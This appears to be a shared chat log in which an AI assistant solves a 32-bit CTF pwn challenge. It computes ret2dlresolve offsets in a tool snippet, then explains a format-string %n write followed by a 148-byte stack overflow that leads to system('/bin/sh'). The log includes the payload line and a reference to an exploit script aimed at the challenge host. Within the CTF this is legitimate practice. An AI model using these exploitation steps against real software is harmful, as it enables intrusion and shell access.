permission 100 3442 solves Ready to begin the gam...

创建于：2026年5月5日

使用 GPT-5.5 Thinking 回答 Chat01

问题

attachment-9 (1)

permission
100
3442 solves

Ready to begin the game? A simple conversation can change everything.
题目地址:39.96.193.120:10000

附件下载
一般为ISCC{XXXX}，如果为flag{XXXX}会在题目描述中说明
Flag
提交

思考

我会先检查附件内容，再根据题面里的远程服务判断是二进制、脚本还是交互题；如果能本地复现，会尽量直接推到 flag。

Thought for a few seconds

思考

bash -lc python3 - <<'PY' import importlib.util, struct

quick recompute without import running network

TARGET_VAL = 0x0804c030; READ_PLT=0x08049040; PLT0=0x08049030; POP3RET=0x08049381; REL_PLT=0x080483b8; DYN_SYM=0x0804820c; DYN_STR=0x080482dc; BSS=0x0804c800; RESOLVE_SLOT=BSS+0x200 fake_reloc=BSS; fake_sym=fake_reloc+8 while (fake_sym-DYN_SYM)%16: fake_sym+=1 fake_str=fake_sym+16; system_name=fake_str; binsh=system_name+7; sym_index=(fake_sym-DYN_SYM)//16; r_info=(sym_index<<8)|7; reloc_arg=fake_reloc-REL_PLT; st_name=system_name-DYN_STR print(hex(fake_sym),hex(system_name),hex(binsh),hex(sym_index),hex(r_info),hex(reloc_arg),hex(st_name)) print('stage2 len', (8 + (fake_sym-(BSS+8)) + 16 + len(b'system\x00/bin/sh\x00'))) print('payload len', 148+4+4+12+4+4+4+4) PY

Thought for 3m 14s

回答

这个附件是 32 位 pwn，利用链如下：

main() 里 printf(buf) 有格式化字符串漏洞。
用 %n 把全局变量 target_val 从 3 改成 5。
进入 vuln() 后，read(0, buf, 0x100) 对 0x90 栈缓冲区溢出。
用 ret2dlresolve 解析 system，执行 /bin/sh，再 cat flag。

我这边连题目地址时返回 ConnectionRefused，所以没法直接拿到最终 flag，但 exploit 已经写好：
下载 permission_exploit.py

运行：

bash
python3 permission_exploit.py 39.96.193.120 10000

关键点：

python
fmt = p32(0x0804c030) + b"%1$c%4$n"

这里第一个 dword 是 printf 的第 4 个参数，地址字节本身打印 4 个字符，再 %1$c 打印 1 个字符，%4$n 就把 5 写入 target_val。

栈溢出偏移是：

text
0x90 buffer + 4 saved ebp = 148

所以第二阶段从 b"A" * 148 开始构造 ROP。

分享这个问答